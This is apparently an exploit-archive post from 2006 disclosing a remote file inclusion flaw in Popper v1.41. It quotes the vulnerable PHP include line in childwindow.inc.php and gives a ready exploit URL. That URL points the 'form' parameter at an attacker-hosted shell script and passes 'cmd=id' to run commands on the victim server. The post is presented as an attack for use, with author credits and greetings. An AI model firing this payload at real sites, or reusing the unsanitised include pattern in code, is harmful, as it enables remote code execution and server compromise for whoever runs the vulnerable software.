[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Popper <= v1.41-r2 (form) Remote File Include Vulnerability
# Published : 2006-09-12
# Author : SHiKaA
# Previous Title : PmWiki <= 2.1.19 (Zend_Hash_Del_Key_Or_Index) Remote Exploit
# Next Title : webSPELL <= 4.01.01 Database Backup Download Vulnerability


#==============================================================================================
#Popper <= v1.41 (form) Remote File Inclusion Exploit
#===============================================================================================
#                                                                      
#Critical Level : Dangerous                                            
#                                                                      
#Venedor site : http://popper.ractive.ch/      
#                                                                      
#Version : v1.41                                             
#
#================================================================================================
#Bug in : childwindow.inc.php
#
#Vlu Code :
#--------------------------------
#
#     <?php include($form.".form.inc.php");?>
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/childwindow.inc.php?form=http://SHELLURL.COM?&cmd=id
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : CCtream - Cyper-worrier team
# Special Thx To : Str0ke & simoo
==================================================================================================

# www.Syue.com [2006-09-12]